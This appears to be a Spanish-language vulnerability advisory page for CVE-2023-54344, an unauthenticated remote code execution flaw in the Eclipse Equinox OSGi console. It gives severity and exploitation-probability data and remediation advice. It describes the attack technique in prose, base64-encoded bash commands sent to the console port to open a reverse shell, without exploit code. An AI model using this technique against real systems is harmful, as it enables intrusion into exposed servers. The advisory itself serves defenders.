Skip to content
CVSS 9.8 · CRITICAL

CVE-2023-54344

Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.

Ver en NVD

Análisis

Eclipse Equinox OSGi versions 3.7.2 and earlier are vulnerable to unauthenticated remote code execution via the console interface. Attackers can send specially crafted payloads to execute arbitrary bash commands and establish reverse shells. Java developers and system administrators should ensure their OSGi console is not exposed to the network and update to a patched version immediately.

Severidad

Puntaje: 9.8(CRITICAL)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
AV: NETWORK
AC: LOW
PR: NONE
UI: NONE
S: UNCHANGED
C: HIGH
I: HIGH
A: HIGH
Tipo de falla (CWE): CWE-306

EPSS

Probabilidad de explotación (próx. 30 días): 0.0015 (0.2%)
Percentil: 35.3%
EPSS: 2026-05-06

Descripción técnica

Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections.

Publicada: 5/5/2026, 12:16:16
Última modificación: 5/5/2026, 19:47:31

Referencias

InicioEventosBlogRecursosEquipo